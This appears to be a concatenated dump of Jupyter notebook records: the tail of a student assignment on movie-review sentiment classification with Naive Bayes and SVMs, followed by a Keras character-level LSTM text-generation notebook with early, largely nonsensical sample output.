81.70%\n" ] ], [ [ "#### (Q3.5) Write code to calculate and report variance, in addition to the final performance. (1pt)\n\n**Please report all future results using 10-fold cross-validation now\n(unless told to use the held-out test set).**", "_____no_output_____" ] ], [ [ "print(\"10-fold validation variance: {0:.2f}\".format(smoothing_variance))", "10-fold validation variance: 6.51\n" ] ], [ [ "## Features, overfitting, and the curse of dimensionality\n\nIn the Bag-of-Words model, ideally we would like each distinct word in\nthe text to be mapped to its own dimension in the output vector\nrepresentation. However, real world text is messy, and we need to decide\non what we consider to be a word. For example, is “`word`\" different\nfrom “`Word`\", from “`word`”, or from “`words`\"? Too strict a\ndefinition, and the number of features explodes, while our algorithm\nfails to learn anything generalisable. Too lax, and we risk destroying\nour learning signal. In the following section, you will learn about\nconfronting the feature sparsity and the overfitting problems as they\noccur in NLP classification tasks.", "_____no_output_____" ], [ "#### (Q3.6): A touch of linguistics (1pt)\n\nTaking a step further, you can use stemming to\nhash different inflections of a word to the same feature in the BoW\nvector space. How does the performance of your classifier change when\nyou use stemming on your training and test datasets? Please use the [Porter stemming\n algorithm](http://www.nltk.org/howto/stem.html) from NLTK.\n Also, you should do cross validation and concatenate the predictions from all folds to compute the significance.", "_____no_output_____" ] ], [ [ "stemming_avg_accuracy, stemming_variance, stemming_results_kfold = do_kfold(\"BOTH\", True, True)\nprint(\"10-fold stemming average accuracy {0:.2f}%\".format(stemming_avg_accuracy))", "Progress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\n10-fold stemming average accuracy 81.45%\n" ] ], [ [ "#### (Q3.7): Is the difference between NB with smoothing and NB with smoothing+stemming significant? (0.5pt)\n", "_____no_output_____" ] ], [ [ "p_value = sign_test(stemming_results_kfold, smoothing_results_kfold)\nprint(\"p_value =\", p_value)", "/usr/local/Cellar/ipython/7.1.1/libexec/vendor/lib/python3.7/site-packages/ipykernel_launcher.py:27: DeprecationWarning: `comb` is deprecated!\nImporting `comb` from scipy.misc is deprecated in scipy 1.0.0. Use `scipy.special.comb` instead.\n" ] ], [ [ "#### Q3.8: What happens to the number of features (i.e., the size of the vocabulary) when using stemming as opposed to (Q3.2)? (0.5pt)\nGive actual numbers. You can use the held-out training set to determine these.", "_____no_output_____" ] ], [ [ "bayes = BayesClassifier(False, False, 1)\nbayes_stemming = BayesClassifier(False, True, 1)\n\ntrain_indices = list(range(0, 900))\n\nbow = bayes.train(train_indices, [])\nbow_stemming = bayes_stemming.train(train_indices, [])\n\nprint(\"Number of words withouth stemming: {}\".format(bow.get_n_unique_words()))\nprint(\"Number of words with stemming: {}\".format(bow_stemming.get_n_unique_words()))", "Number of words withouth stemming: 45348\nNumber of words with stemming: 32404\n" ] ], [ [ "#### Q3.9: Putting some word order back in (0.5+0.5pt=1pt)\n\nA simple way of retaining some of the word\norder information when using bag-of-words representations is to add **n-grams** features. \nRetrain your classifier from (Q3.4) using **unigrams+bigrams** and\n**unigrams+bigrams+trigrams** as features, and report accuracy and statistical significances (in comparison to the experiment at (Q3.4) for all 10 folds, and between the new systems).\n\n\n\n", "_____no_output_____" ] ], [ [ "bigram_avg_accuracy, bigram_variance, bigram_results_kfold = do_kfold(True, False, 2)\ntrigram_avg_accuracy, trigram_variance, trigram_results_kfold = do_kfold(True, False, 3)\n\nprint(\"Unigram average accuracy {0:.2f}%\".format(smoothing_avg_accuracy))\nprint(\"Bigram average accuracy {0:.2f}%\".format(bigram_avg_accuracy))\nprint(\"Trigram average accuracy {0:.2f}%\".format(trigram_avg_accuracy))", "Progress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\nProgress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\nUnigram average accuracy 81.70%\nBigram average accuracy 84.30%\nTrigram average accuracy 85.15%\n" ], [ "print(\"Improvement from unigrams to unigrams+bigrams\")\np_value = sign_test(bigram_results_kfold, smoothing_results_kfold)\nprint(\"p_value =\", p_value)\n\n\nprint(\"\\n\\nImprovement from unigrams+bigrams to unigrams+bigrams+trigrams\")\np_value = sign_test(bigram_results_kfold, trigram_results_kfold)\nprint(\"p_value =\", p_value)", "Improvement from unigrams to unigrams+bigrams\n" ] ], [ [ "\n#### Q3.10: How many features does the BoW model have to take into account now? (0.5pt)\nHow does this number compare (e.g., linear, square, cubed, exponential) to the number of features at (Q3.8)? \n\nUse the held-out training set once again for this.\n", "_____no_output_____" ] ], [ [ "bayes_bigrams = BayesClassifier(False, False, 2)\nbayes_trigrams = BayesClassifier(False, False, 3)\nbayes_fourgrams = BayesClassifier(False, False, 4)\n\ntrain_indices = list(range(0, 900))\n\nbow_bigrams = bayes_bigrams.train(train_indices, [])\nbow_trigrams = bayes_trigrams.train(train_indices, [])\n\nprint(\"Number of features with unigrams: {}\".format(bow.get_n_unique_words()))\nprint(\"Number of features with bigrams: {}\".format(bow_bigrams.get_n_unique_words()))\nprint(\"Number of features with trigrams: {}\".format(bow_trigrams.get_n_unique_words()))", "Number of features with unigrams: 45348\nNumber of features with bigrams: 471032\nNumber of features with trigrams: 1416686\n" ] ], [ [ "As you can see the number of features goes from ~50,000 to ~500,000 to ~1,500,000 this shows that the increase in features is exponential", "_____no_output_____" ], [ "# Support Vector Machines (4pts)\n", "_____no_output_____" ], [ "Though simple to understand, implement, and debug, one\nmajor problem with the Naive Bayes classifier is that its performance\ndeteriorates (becomes skewed) when it is being used with features which\nare not independent (i.e., are correlated). Another popular classifier\nthat doesn’t scale as well to big data, and is not as simple to debug as\nNaive Bayes, but that doesn’t assume feature independence is the Support\nVector Machine (SVM) classifier.\n\nYou can find more details about SVMs in Chapter 7 of Bishop: Pattern Recognition and Machine Learning.\nOther sources for learning SVM:\n* http://web.mit.edu/zoya/www/SVM.pdf\n* http://www.cs.columbia.edu/~kathy/cs4701/documents/jason_svm_tutorial.pdf\n* https://pythonprogramming.net/support-vector-machine-intro-machine-learning-tutorial/\n\n\n\n\n\n\n\nUse the scikit-learn implementation of \n[SVM.](http://scikit-learn.org/stable/modules/svm.html) with the default parameters.\n\n", "_____no_output_____" ], [ "#### (Q4.1): Train SVM and compare to Naive Bayes (2pt)\n\nTrain an SVM classifier (sklearn.svm.LinearSVC) using your features. Compare the\nclassification performance of the SVM classifier to that of the Naive\nBayes classifier from (Q3.4) and report the numbers.\nDo cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better?\n\n", "_____no_output_____" ] ], [ [ "from sklearn import preprocessing, model_selection, neighbors, svm\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.svm import LinearSVC as SVC\nfrom nltk.tokenize import TreebankWordTokenizer\n\n#\n## Returns test_indices, and train_indices according to the round robin split algorithm.\n## adjusted to before, as features object has 2000 rows and not just 1000\n#\ndef round_robin_split_indices_features(n_split):\n test_indices = []\n train_indices = []\n test_indices_features = []\n for i in range(0, 1000):\n if i % 10 == n_split:\n test_indices.append(i)\n else:\n train_indices.append(i)\n \n test_indices_features = test_indices + [x + 1000 for x in test_indices]\n train_indices_features = train_indices + [x + 1000 for x in train_indices]\n \n return train_indices_features, train_indices, test_indices_features, test_indices\n\n# example: split 5 is testsplit at the moment\n#train_features, train_ind, test_features, test_ind = round_robin_split_indices(5)\n\n#\n## vectorizes original text documents \n#\ndef get_vectorized_corpus(reviews, indices, tags, without_closed):\n corpus = []\n\n for review in reviews: \n if (review['cv'] not in indices):\n continue\n words = []\n word_tag = []\n\n for line in review['content']:\n for word_pair in line:\n word = word_pair[0].lower() \n \n if(tags != False):\n tag = word_pair[1]\n\n if(without_closed != False):\n \n if(tag.startswith(('V', 'N', 'RB', 'J'))):\n word_tag = word + \"_\" + tag\n \n else:\n continue\n else:\n word_tag = word + \"_\" + tag \n \n else:\n word_tag = word\n words.append(word_tag)\n corpus.append(' '.join(map(str, words)))\n\n count_vect = CountVectorizer(tokenizer = TreebankWordTokenizer().tokenize)\n vectorized_features = count_vect.fit_transform(corpus).toarray()\n \n return vectorized_features\n\n#\n## get original sentiment labels\n#\ndef get_labels(reviews, indices):\n labels = []\n for review in reviews: \n if (review['cv'] not in indices):\n continue\n else: \n labels.append(review[\"sentiment\"])\n return labels\n\n#\n## for obtained indices, one svm is fitted and evaluated according to training and test documents\n#\ndef train_and_classify_one_svm(features, train_indices_features, train_indices, test_indices_features, test_indices):\n\n # training indices \n train_features = features[train_indices_features]\n train_labels = get_labels(reviews, train_indices)\n\n # test indices \n test_features = features[test_indices_features]\n test_labels = get_labels(reviews, test_indices)\n\n # linear SVM on training feature vector and labels \n classifier = SVC()\n classifier.fit(train_features, train_labels)\n\n # label prediction for test_feature vector\n label_prediction = classifier.predict(test_features)\n \n # tracking results\n total = 0\n correct = 0\n results = []\n\n for i in range(0, len(test_labels)):\n\n if label_prediction[i] == test_labels[i]:\n correct += 1\n results.append('+')\n else:\n results.append('-')\n total += 1\n\n\n accuracy = correct / total * 100\n \n return accuracy, results\n\n#\n## similar to NB, kfold for SVM (only difference are slightly different indices (due to structure of feature object))\n#\ndef do_kfold_svm(tags=False, without_closed=False): \n\n # create features depending on type of tags [notags, alltags, withoutclosedform]\n \n features = get_vectorized_corpus(reviews, list(range(0,1000)), tags, without_closed)\n\n sum_accuracy = 0\n accuracies = []\n total_variance = 0\n \n all_results = []\n \n for i in range(0, 10):\n print(\"Progress {0:.0f}%\".format(i / 10 * 100))\n \n train_features, train_ind, test_features, test_ind = round_robin_split_indices_features(i)\n \n accuracy, results = train_and_classify_one_svm(features, train_features, train_ind, test_features, test_ind)\n sum_accuracy += accuracy\n \n accuracies.append(accuracy)\n \n for r in results:\n all_results.append(r)\n\n avg_accuracy = sum_accuracy / 10\n \n for i in range(0, 10):\n sqred_error = (accuracies[i] - avg_accuracy)**2\n total_variance += sqred_error\n \n variance_accuracy = total_variance / 10 \n \n return avg_accuracy, variance_accuracy, all_results\n \n\n# calculate svm kfold \nsvm_avg_accuracy, svm_variance, svm_results_kfold = do_kfold_svm()\n\nprint(\"10-fold average accuracy {0:.2f}%\".format(svm_avg_accuracy))\nprint(\"10-fold accuracy variance {0:.2f}%\".format(svm_variance))\n\n# significant difference to Q3.4?\np_value = sign_test(smoothing_results_kfold, svm_results_kfold)\nprint(\"p_value =\", p_value)", "Progress 0%\nProgress 10%\n" ] ], [ [ "### More linguistics\n\nNow add in part-of-speech features. You will find the\nmovie review dataset has already been POS-tagged for you. Try to\nreplicate what Pang et al. were doing:\n\n", "_____no_output_____" ], [ "#### (Q4.2) Replace your features with word+POS features, and report performance with the SVM. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significant? Why? (1pt)\n", "_____no_output_____" ] ], [ [ "# What canges, when pos tags are taken into consideration as well? \nsvm_avg_accuracy_with_tags, svm_variance_with_tags, svm_results_kfold_with_tags = do_kfold_svm(tags=True)\n\nprint(\"10-fold average accuracy {0:.2f}%\".format(svm_avg_accuracy_with_tags))\nprint(\"10-fold accuracy variance {0:.2f}%\".format(svm_variance_with_tags))\n\n# significant difference to Q3.4?\np_value = sign_test(svm_results_kfold, svm_results_kfold_with_tags)\nprint(\"p_value =\", p_value)", "Progress 0%\n" ] ], [ [ "#### (Q4.3) Discard all closed-class words from your data (keep only nouns (N*), verbs (V*), adjectives (J*) and adverbs (RB*)), and report performance. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better than when we don't discard the closed-class words? Why? (1pt)", "_____no_output_____" ] ], [ [ "svm_avg_accuracy_without_closed, svm_variance_without_closed, svm_results_kfold_without_closed = do_kfold_svm(tags=True, without_closed=True)\n\nprint(\"10-fold average accuracy {0:.2f}%\".format(svm_avg_accuracy_without_closed))\nprint(\"10-fold accuracy variance {0:.2f}%\".format(svm_variance_without_closed))\n\n# significant difference to all POS tags allowed?\np_value = sign_test(svm_results_kfold_with_tags, svm_results_kfold_without_closed)\nprint(\"p_value =\", p_value)\n", "Progress 0%\nProgress 10%\n" ] ], [ [ "# (Q5) Discussion (max. 500 words). (5pts)\n\n> Based on your experiments, what are the effective features and techniques in sentiment analysis? What information do different features encode?\nWhy is this important? What are the limitations of these features and techniques?\n \n", "_____no_output_____" ], [ "*Write your answer here in max. 500 words.*\nDiscussion:\neffective features:\n\n- Smoothing, thus not excluding words, that are not seen in the training data, but give them a non zero probability, leads to significantly better accuracy, than Naive Bayes without smoothing. \n\n- Stemming:", "_____no_output_____" ], [ "# Submission \n", "_____no_output_____" ] ], [ [ "# Write your names and student numbers here:\n# Dirk Hoekstra #12283878\n# Philipp Lintl #12152498", "_____no_output_____" ] ], [ [ "**That's it!**\n\n- Check if you answered all questions fully and correctly. \n- Download your completed notebook using `File -> Download .ipynb` \n- Also save your notebook as a Github Gist. Get it by choosing `File -> Save as Github Gist`. Make sure that the gist has a secret link (not public).\n- Check if your answers are all included in the file you submit (e.g. check the Github Gist URL)\n- Submit your .ipynb file and link to the Github Gist via *Canvas*. One submission per group. ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ] ]
cb1c7dcc286314efd43ab9402bec4bad634d46dc
24,216
ipynb
Jupyter Notebook
keras/170519-lstm-text-generation.ipynb
aidiary/notebooks
1bb9338441e12ee52e287ea40179a5f271a5a2be
[ "MIT" ]
3
2018-02-03T09:33:51.000Z
2020-11-23T08:46:43.000Z
keras/170519-lstm-text-generation.ipynb
aidiary/notebooks
1bb9338441e12ee52e287ea40179a5f271a5a2be
[ "MIT" ]
null
null
null
keras/170519-lstm-text-generation.ipynb
aidiary/notebooks
1bb9338441e12ee52e287ea40179a5f271a5a2be
[ "MIT" ]
null
null
null
40.225914
451
0.663239
[ [ [ "from keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers import LSTM\nfrom keras.optimizers import RMSprop\nfrom keras.utils.data_utils import get_file\nimport numpy as np\nimport random\nimport sys", "_____no_output_____" ], [ "path = get_file('nietzsche.txt', origin='https://s3.amazonaws.com/text-datasets/nietzsche.txt')\ntext = open(path).read().lower()\nprint('corpus length:', len(text))", "corpus length: 600893\n" ], [ "chars = sorted(list(set(text)))", "_____no_output_____" ], [ "print('total chars:', len(chars))", "total chars: 57\n" ], [ "char_indices = dict((c, i) for i, c in enumerate(chars))\nindices_char = dict((i, c) for i, c in enumerate(chars))", "_____no_output_____" ], [ "maxlen = 40 # この長さのテキストに分割する\nstep = 3 # オーバーラップ\nsentences = []\nnext_chars = []\nfor i in range(0, len(text) - maxlen, step):\n sentences.append(text[i: i + maxlen]) # 入力となる長さ40の文字列\n next_chars.append(text[i + maxlen]) # 予測したい次の文字\nprint('num sequences:', len(sentences))", "num sequences: 200285\n" ], [ "len(sentences[0]), sentences[0]", "_____no_output_____" ], [ "next_chars[0]", "_____no_output_____" ], [ "print('Vectorization...')\n# 入力は長さ maxlen の文字列なのでmaxlenが必要\nX = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)\n# 出力は1文字しかないので maxlen は不要\ny = np.zeros((len(sentences), len(chars)), dtype=np.bool)\nfor i, sentence in enumerate(sentences):\n for t, char in enumerate(sentence):\n X[i, t, char_indices[char]] = 1 # 対象文字のみTrueとなるベクトルにする\n y[i, char_indices[next_chars[i]]] = 1", "Vectorization...\n" ], [ "print(X.shape, y.shape)", "(200285, 40, 57) (200285, 57)\n" ], [ "print(X[0][0])", "[False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False False False True False False False False False\n False False False False False False False False False]\n" ], [ "print(y[0])", "[False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False True False False False False False False False\n False False False False False False False False False]\n" ], [ "print('Build model...')\nmodel = Sequential()\n\n# LSTMの入力は (バッチ数, 入力シーケンスの長さ, 入力の次元) となる(バッチ数は省略)\n# maxlenを変えてもパラメータ数は変化しない(各時刻でパラメータは共有するため)\n# 128は内部の射影と出力の次元(同じになる)\nmodel.add(LSTM(128, input_shape=(maxlen, len(chars))))\n# 出力の128次元にさらにFCをくっつけて文字ベクトルを出力\nmodel.add(Dense(len(chars))) # 出力\nmodel.add(Activation('softmax'))", "Build model...\n" ], [ "model.summary()", "_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nlstm_9 (LSTM) (None, 128) 95232 \n_________________________________________________________________\ndense_8 (Dense) (None, 57) 7353 \n_________________________________________________________________\nactivation_8 (Activation) (None, 57) 0 \n=================================================================\nTotal params: 102,585\nTrainable params: 102,585\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "optimizer = RMSprop(lr=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer)", "_____no_output_____" ], [ "# 200285個の長さ40の時系列データ(各データは57次元ベクトル)の意味\nprint(X.shape, y.shape)", "(200285, 40, 57) (200285, 57)\n" ], [ "def sample(preds, temperature=1.0):\n preds = np.asarray(preds).astype('float64')\n # temperatureによって確率が変わる???\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n # 確率が最大のインデックスを返す\n return np.argmax(probas)", "_____no_output_____" ], [ "for iteration in range(1, 60):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n\n # 時系列データを入力して学習\n# model.fit(X, y, batch_size=128, epochs=1)\n \n # 学習データのランダムな位置の40文字に続く文字列を生成する\n start_index = random.randint(0, len(text) - maxlen - 1)\n\n generated = ''\n sentence = text[start_index: start_index + maxlen]\n generated += sentence\n\n print('----- Generating with seed: \"' + sentence + '\"')\n sys.stdout.write(generated)\n\n # 400文字分生成する\n # この400文字を生成している間、LSTMに内部状態が保持されている?\n for i in range(400):\n x = np.zeros((1, maxlen, len(chars)))\n\n # sentenceを符号化\n # このsentenceは400回のループで生成された文字を加えて次送りされていく\n for t, char in enumerate(sentence):\n x[0, t, char_indices[char]] = 1.0\n\n # 57次元(文字数)の出力分布\n # (系列長=40, データ次元=57) を入力\n preds = model.predict(x, verbose=0)[0]\n\n # もっとも確率が高いのを選ぶのではなくサンプリングする?\n next_index = sample(preds, diversity)\n next_char = indices_char[next_index]\n\n generated += next_char\n\n # 入力は長さ40にしたいので今生成した文字を加えて1つ先に送る\n # このsentenceが次の入力となる\n sentence = sentence[1:] + next_char\n\n sys.stdout.write(next_char)\n sys.stdout.flush()", "\n--------------------------------------------------\nIteration 1\n\n----- diversity: 0.2\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have prroaaooooanaaoahoooaaaaoaaaaoaooaaaantaooaaaaaaaoanoooaoaaaooaaoaooooaaanaoaaaaoaohaoaaaoaaaaoaaoaaoaaoaoaoonaahaooaoaaaaaaaooaaoaohacooaaoaohoooonaaaoaoaohooaooaoaaaohooaoooaaaoaorooaaoaaaanaaaaoaahooaaaaaaoaaaaoaoaonaaaaaoaaoaaoaaaoaooaoonnanoaaaaoaoahaalocnoaaaonaannoaanaaaaanaahaaaaooaaolaaohanaaaaaaaoaoaoaonoaoaaoaroaoooaaaoaaahoaaaaaoooaoaooaaonnaaaoaoaoaaahaaaaaaaaaooanaaaanaoaooaaonoaaaarna\n\n----- diversity: 0.5\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have prooaarrahllcoaannnoatoaaaotaoooonanaoahonhhtaaoahonoonnnaraaanooonlnaolaotoataacacatoaehanooncaioloaaitoolatatahllranaaaoohahloonanaoloohohancnchnohaaalooaaaahotartalnoahonahrnnnonroaaaooaoooaonoanooaohrdaacodhcthnaococoaoahooroaohlncanotrollanaoaohooaoathnaaornaanaoadlnrhlcaoroacrcohntaaaoahoaanolocoaahhonootaaollanonhaaoactohchcnadnaordnlnattaaclrnrohnrnndhaaloonoatnonwaaaaoloonoononlnaaaaanrahat\n\n----- diversity: 1.0\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have prlohrrcwohahc-hderaoyinaanodddtlhohcoancorncrhcooh sohodcrcc aeonaonhdoaarn-olatpryhrhtlnwhhronaalrdcoannhoorhdlonoitantaaahcaanrcolrlraaloatnrononoorunrrdhnnlchoo llearavihonrahoaadoitctcaoowchiucatvawlrtlahhccolahnatan lnorncaoannooaaa thrhoia rhnrcdlrnaaarhronhayctlnaahoaolcholh,rhlahdaolnroccoonoolohtcn nalndarhddnnioolooolroaialcaahartnarloaanlntonaitaocdnhtolawvwohnaianaoocoinlrniaalfnlnnarll\n\n----- diversity: 1.2\n----- Generating with seed: \"now--it dawns upon men that\nthey have pr\"\nnow--it dawns upon men that\nthey have propnawrhcaeoslthnohhncsnoi\nooldnnawd.taeonoaaa ahaortntchorrfhaadanaddt(atoct\nnanho ohancirhnlatoroltnoa hcaohnidahtlilnotlollnalfaofaaotnwtblnnnaooholoallho-oosnnthloapdalcthhctclocthpdwtaaticolcnlehntcwto\naaahoaarlocnthcnt-rhctn \n notondoiiosnhdnshristrtloraacodtcartwlrn onlotlniodooz odhcclsonrnnaontnnaaoah tpo dhilalenotdahohoaoanyhohnoat5ghnlaaoanlntonndatallaclocyonaosnc-landratrnacloah stadd\n\n--------------------------------------------------\nIteration 2\n\n----- diversity: 0.2\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicaooaaananaaohaaooaaoaaaaaaaaooaaaoahnoaaaanaaaaaoaoaaaaaaaoaoalnnaaaonoaoaaaanaoaaoaaanaaoaanooaaaaanoaaaaaoaooaaaanaanoaaaaaaaaaaaonaaaoaooaaoooaaooononaaaaaaaooaaaoaaaaaaaaaonlanaaacaaaoaardahaoaoaanooaaaaaaorooaaoaaaananaaonaooooaaaroanohnaaaaaaaaranoaaaaaoaaaoaoaanoalanoonoaoarnoaaaaahaoaaaaoaaaaaanaaaaaaoaaoaooanoooaoaaaooaoooroaaaaaaoaooaaaaoaaooaaaooaaaaaaoaaaaaonaaaooaonoaaoaoaooaanaanaano\n\n----- diversity: 0.5\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicoalnaroahcnaonnaoraraal hoocaaarlonionocohnclhootlhtoctolaanroaccocaaooaoonoltorroaaalaroard oocdotrlorahandlnlrahcaochoaaaaldaoaaloco-oolonaalolharaaaoohaoahaannaaohaolacwn aionantaooooooaaaaoaoaocolannoaaooohohaonaacolctahlo lohaoodllonooahaoohtcnaohhooonohnaonnoalroaaoonttoonhotholooanracnoaahlcacooananrrolohtoorrohoaaaaonrorrolhhnaatoalntloodnohnraorooaooaaraoanraaaohhlooddnolaaarrlnrooraoaoah\n\n----- diversity: 1.0\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicalohhtarioaharnnlhowhotcwaohrcnlaraocdnwoahiahanaoaihoattnnnawohataoennnronacoorganaolsalrdaonahannaarpananatcoydddlhavhnonhhnalooldtwhaoanooh natnloheoidshadwyahoaco ootahcnorodhhhaadradlyoc hohnrnnrwocllaohdnoanadrnldhnrhloraolaonlnhwndrhoaaoncthlcrltonartoaalnhoahwanhoaothnrircc thnonsaacnhl cenhddolaraa noaachadooolg ylnlsodslaor dnlnnoccaalcopalcrnahrhranorrotilliasnldllaaa nhraaanhhcatnowlc\n\n----- diversity: 1.2\n----- Generating with seed: \"uation\nis at the back of all their logic\"\nuation\nis at the back of all their logicohaoa iiydeloon atntclonwnlwniriaocatoaroolaccrttannhhnooaohonaritaloacdehlhrfoodlnsebnoohtdronaoahacwnnrorfcnnrdd haonlnhcnhdtnl tahrotirwrchcdehahcsahrnhtdfnloonphotlla cnrcoaoaorcndhnrhlrth-nhdrnnaa0occehantaatonpodrr\nhnchnvlhopoldhaaohptstnonhaoehhcatoaconsoohaoddnodnoanaacaan-narlo,oaiylaahctoyodcaoreaoiniaanaodthsohoncladnoo\nnrrlhohs coailindhtnhdtaatpcnclwotoalrocracanrh caoactal?lcaononn\n\n--------------------------------------------------\nIteration 3\n\n----- diversity: 0.2\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitoooaaooooaaaaoaoaaooooooalaaoraonaaanaaanooanaaaanoaoaaaaaoaaaooaaroaaaoaoaaaaoaaannaolaaaaoaoaaoaaaaaaoaaoaaaaaoanoooolaaooaaahaaooanaaoaonoaoalaoaoaaaooaaaaoalaoooaaaooaacraaaooaooaaooaaanaaaaaooaaoaoooaaaaaonoaaaaraaohnnaaahraaaaoaaaaaaaaroaaooaooaraoaoaaaoaooonaaaoaooooaoaooooaonaoaaaalaanaaooaooaoaoahoaaaaaaaaaaooooaaanaaaaaalonoaaaonaoonaaloaaaaaanaaaaoooaoaonaaaanaaoaoaoaaaaaaaoaonanoononao\n\n----- diversity: 0.5\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitoaonaaaanotnhnanoohuhhactolaraaahcroacaattoannaonhhaaloodaaatonraloooaraanooooraooalaoataaonhadarooroahononaoancarhhnaoaoarooroanohnccadcathoatocoaarannonaaoactnaoanacaaadnolneaaaolohahoooaooalnnlhanaohooooarnaooalnnnoronaaddanaoharcohaaanwaoaarainotooochdthaoadahloallanacoclhorooooho noohrnrlrnaochnnaonraooaoanaothaonotrhtwacohnaaoaaatoooraaaoonoiaotnoarraoooanaooaadrnhodthaaaaocontoaraonnehronnl\n\n----- diversity: 1.0\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitralanlhoy edlaaashtochaoraachahhlnldnarnooocrohwolcioocciaaowcoltiho aachdliloalcwaclooaoalaniodsaoddwioladhhnfaolldtacahohnpatrntrachadahttoaahrdanpoatlaahoolyannasanrdlaeoahdrdtveohrhaoolpehevohrlds nntnadoronoaooclhnoahdrtonlcnacrinlchhohn hlolohtlaropoobaochdc aonhodapwnnasrohinaalhacatnaacl\nrrooooncrnolhaelacocaalsacnndehiaeannacconl aoatno adonaooooooonnocncslarnanhatlcoai crhcvrrtahantodioa\n\n----- diversity: 1.2\n----- Generating with seed: \"t it is difficult to preach this\nmoralit\"\nt it is difficult to preach this\nmoralitiadncctdwrncrrdrnhrolociocaaiaalcadiaarcccavdh-ooihhilnaonactoonnvddaaaoalacwcalrlyhtholllhoadhdnd p1nrannlci?adn ndoaalcla dclnoreonhthoyraodtaononhlfnacanhoo nlodcaahhhoociroaaidoohalwlrtoaolocohatl hwairaortaa c.cayaorridtcrocgntllwlaolaaloldorhaniplooflyonptlhrhclnaonayluttnawaaaacycaidlyohlonahnonaltehrsntccarlhnarhlnawnaonaallralottapaasorcc,thearrsldlswodohlanntonsaglcaaha laplorwéonorcaahr\n\n--------------------------------------------------\nIteration 4\n\n----- diversity: 0.2\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lighteaoaaaalaaoaaoaanoaoaanoaaaaaaaaaooaoaaaoaaaaaoaanaaaaanaoooaoaaooaooaoohoooaaaaaooaaaoaaooaraooaaaoolonoohaaaaaaoonoaaaaooanaaaacaaaooaoaaaaooohnoaaanaaaaoaaaaaaaaaaooaaaaaaoooaaoaaaaoaoaaatonooorahoaoaaoooraaaaaaaaoooaaoaaononoaaaaaaanaaoaaaaaanaaaaooaaaoaanconoconaaaaaooaooaoonnaoaaaoaooooaoanaaoaaaanoaaaaoaaaaanoohoaooaoloaooaaaaaoaoloonnaaaaaaanaooooanaaooaoooaanaaaoaaaaaooaoooaaaaoaacaaaraoaa\n\n----- diversity: 0.5\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lightecatahacaonaoaaathaoaclnaaladahccroacnoaro naonalrnaonononrrnclhaaranallranalaoocnordcdrnonoontacoaooinidloaohohdahrhaaahololarahroraoaaaaaaotaoaaacltlaallhoolctrhooaoinhcrlcnhoaacaonhnodocoronlaoaoahaaaaanoohdaonnhoncadnaoaoolnhlantoarcaaaarlaoalannnhlaoeoaoaoahararonawooonnn ohaadnlnoonanddoaoaoaaohnaalnahoaoohlodaaoaaaanantaaaooorooaaccoaltoatcaloorltorhailalodoacanonaataotlrahoolrnarnalnrhatrro\n\n----- diversity: 1.0\n----- Generating with seed: \"ns of transition, for the sake of lighte\"\nns of transition, for the sake of lighteubcahorattacdaadocronwhtihwdtrdacdsghaahcnaldccahannoatahaehodonondrrchrtupncranrirdnorotnvonl 